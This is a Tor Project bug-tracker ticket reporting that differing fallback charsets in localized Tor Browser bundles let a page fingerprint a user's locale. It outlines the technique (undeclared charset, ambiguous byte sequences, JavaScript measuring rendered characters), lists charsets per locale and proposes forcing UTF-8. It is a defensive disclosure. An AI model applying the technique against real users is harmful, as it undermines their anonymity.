[Author Prev][Author Next][Thread Prev][Thread Next][Author Index][Thread Index]
[tor-bugs] #10703 [TorBrowserButton]: Fallback charset enables fingerprinting of bundle localization
#10703: Fallback charset enables fingerprinting of bundle localization
------------------------------+---------------------------
Reporter: dcf | Owner: mikeperry
Type: defect | Status: new
Priority: normal | Milestone:
Component: TorBrowserButton | Version:
Keywords: tbb-fingerprints | Actual Points:
Parent ID: | Points:
------------------------------+---------------------------
Torbutton has the `spoof_english` pref that changes the value of the
`Accept-Language` header to `en-us,en;q=0.5`; this cloaks what particular
localized bundle you may be using. But localized bundles still differ in
their default (fallback) charset. By figuring out what characters a byte
sequence decodes as, it's possible to find out what charset is in use.
The attack goes like this. The web server sends an HTML page with no
declared charset, neither in the HTTP header (`Content-Type`) nor in the
HTML (`<meta charset=...`>). The HTML contains one or more byte sequences
that stand for different characters in different charsets. JavaScript in
the HTML measures the size of the rendered characters. By including a few
different byte sequences, it's probably possible to fingerprint all the
possible TBB localizations.
It looks like our current bundles may come with any of 6 different default
charsets:
* [https://en.wikipedia.org/wiki/UTF-8 utf-8]: ar fa
* [https://en.wikipedia.org/wiki/ISO/IEC_8859-1 iso-8859-1]: de es-ES fr
it nl pt-PT vi
* [https://en.wikipedia.org/wiki/ISO/IEC_8859-2 iso-8859-2]: pl
* [https://en.wikipedia.org/wiki/Windows-1251 windows-1251]: ru
* [https://en.wikipedia.org/wiki/EUC-KR#EUC-KR euc-kr]: ko
* [https://en.wikipedia.org/wiki/GBK gbk]: zh
I found these by grepping the langpacks' unpacked `*.xpi` files for
"[http://kb.mozillazine.org/Firefox_:_FAQs_:_About:config_Entries#Intl.
intl.charset.default]".
As an example of how byte sequences can be variously decoded, here are
decodings of "\xc3\xa3":
* utf-8: Ã
* iso-8859-1: ÃÂ
* iso-8859-2: ÄÅ
* windows-1251: ÐÐ
* euc-kr: ì
* gbk: è
That is, an HTML page can contain the sequence "\xc3\xa3" and it will
render as different characters depending on the charset in effect.
A possible solution is just to force intl.charset.default to UTF-8 in all
localizations. Here are some Mozilla bugs I found that are relevant to
setting this pref to UTF-8:
[https://bugzilla.mozilla.org/show_bug.cgi?id=910165 910165]
[https://bugzilla.mozilla.org/show_bug.cgi?id=406498 406498]
[https://bugzilla.mozilla.org/show_bug.cgi?id=536506 536506]
[https://bugzilla.mozilla.org/show_bug.cgi?id=910169 910169].
Also see https://developer.mozilla.org/en-
US/docs/Localizations_and_character_encodings#Specifying_the_fallback_encoding,
which indicates that Firefox's behavior with respect to the fallback
charset will change:
> As of Firefox 28, this section is obsolete, since the preference
intl.charset.default no longer exists. The mapping from locales onto
fallback encodings is now built into Gecko itself.
In the best case, this could be interpreted to mean that the
`spoof_english` setting will become sufficient, and the fallback will
become as it would be for en-US. Or it might just mean that the preference
is moved to somewhere inside Gecko. It seems the relevant bug is
[https://bugzilla.mozilla.org/show_bug.cgi?id=910192 910192: Get rid of
intl.charset.default as a localizable pref and deduce the fallback...].
--
Ticket URL: <https://trac.torproject.org/projects/tor/ticket/10703>
Tor Bug Tracker & Wiki <https://trac.torproject.org/>
The Tor Project: anonymity online
_______________________________________________
tor-bugs mailing list
tor-bugs@xxxxxxxxxxxxxxxxxxxx
https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-bugs